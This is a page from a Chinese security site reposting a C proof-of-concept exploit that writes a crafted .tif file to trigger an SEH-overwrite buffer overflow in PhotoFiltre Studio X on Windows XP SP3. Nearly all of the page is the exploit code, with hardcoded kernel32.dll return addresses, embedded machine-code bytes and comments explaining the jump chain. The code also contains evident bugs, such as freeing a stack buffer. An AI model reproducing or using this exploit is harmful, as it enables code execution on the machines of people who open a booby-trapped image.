首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PhotoFiltre Studio X .tif file local buffer overflow poc(0day) 来源：vfocus.net 作者：Stefan 发布时间：2010-05-05   #include<stdio.h>   #define fisier FILE #define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) #define VER "10.3.0" #define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)" #define AUTHOR "[*]fl0 fl0w"     typedef char i8;     typedef short i16;     typedef int i32;     void gen_random(i8*,const int);     void print(i8*);     i32 mcpy(void*,const void*,i32);     void fwi32(fisier*,i32);     i32 filerr(fisier*);     void error(void);     void filebuild();     unsigned int getFsize(fisier*,i8*);     i32 sizes[]={257,163,217,213,940,29};     typedef struct {             /*Retcodes from MS Windows xp pro sp3             */             i32 popopret;             i32 jmpbyte;             i32 jmpEBP;     }instr;      i32 main()      {filebuild();        printf("%s\n%s\n",POCNAME,AUTHOR);        print("file done");        getchar();      }            void filebuild() {                /*The logic: overwrite seh handler with pop pop ret,overwrite next seh with                 jmp ebp,find the exact location ebp points to and write a jmp 0x40 bytes instr.                 Because there isn't space for shellcode I chose this jmp ebp option.                 And a egghunter wouldn't be the solution because u also need space for it.                */                i8 tif1[]= {     0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00,     0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01,     0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01,     0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00,     0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,     0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01,     0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00,     0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,     0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01,     0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00,     0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02,     0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01,     0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00,     0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89,     0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0,     0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9,0xC3,     };     i8 tif2[]= {     0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00,     0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00,     0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,     0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00,     0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00,     0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00,     0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00,     0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00,     0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00,     0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00,     0xC4, 0x00, 0x33,     };               /*   tif1sz=v[1]                  tif2sz[]=v[2]                  sehoffset=v[3]                  nsehoffset=v[4]                  junksz=v[5]                  jmpebpoffset=v[6] */                       fisier* in=fopen("exploit.in","r"),                         * out=fopen("exploit.tif","wb");               //i8 buf=ALOC(i8,100001);                 i8 buf[100001];               instr* ASM;               ASM=ALOC(instr,sizeof(instr));               ASM->popopret=0x7C86CFC2;//pop esi pop edi ret from kernel32.dll                ASM->jmpbyte=0xeb400300;//jmp over(u need to cause a exception NOT a exit call,so work on the instr)               ASM->jmpEBP=0x7C81ACD3;//JMP EBP from kernel32.dll               memcpy(tif1+217,&ASM->popopret,4);               memcpy(tif1+213,&ASM->jmpEBP,4);               memcpy(tif1+29,&ASM->jmpbyte,4);               if(out){              fwrite(tif1,sizeof(i8),sizeof(tif1),out);              gen_random(&buf,940);              fwrite(&buf,sizeof(i8),940,out);              fwrite(tif2,sizeof(i8),sizeof(tif2),out);              fclose(out);              free(buf);              }              else {                     error();                }                       }            void error(void) {                 perror("\nError:");           }           i32 filerr(fisier* F) {               return (ferror(F));            }            void readf(void) {                            }                      void fwi32(fisier* F,i32 adr) {            fputc(adr&0xff,F);            fputc((adr>>8)&0xff,F);            fputc((adr>>16)&0xff,F);            fputc((adr>>24)&0xff,F);     }     i32 mcpy(void* dest,const void* source,i32 len)    { void* D=dest;      const void* S=source;      len=sizeof(source);      memcpy(D,S,len);      return (len);        }      void print(i8* msg)     {        printf("[*]%s\n",msg);     }       void gen_random(i8* s,const int len)     { i32 i;       static const i8 alphanum[]= {       "0123456789ABCDEFGHIJKLMNOPQRST"       "UVWXYZabcdefghijklmnopqrstuvwxyz"};       for(i=1;i<len;++i)       {         s[i]=alphanum[rand()%(sizeof(alphanum)-1)];       }        s[len]=0;       }        [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Internet Explorer 8.0 Denial o ·VicFTPS v5.0 Directory Travers ·PHP-Nuke 7.0/8.1/8.1.35 Wormab ·Beyond Compare 3.0.13 b9599 (. ·Knowledge Root version 0.9.9.5 ·Linux x86 - execve("/bin/bash" ·RealVNC VNC Server Free Editio ·Avant Browser Denial of Servi ·Firefox 3.6.3 & Safari 4.0.5 w ·ProSSHD 1.2 remote post-auth e ·Safari 4.0.5 & Camino 2.0.2 hi ·Winamp v5.572 0day Local Crash   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved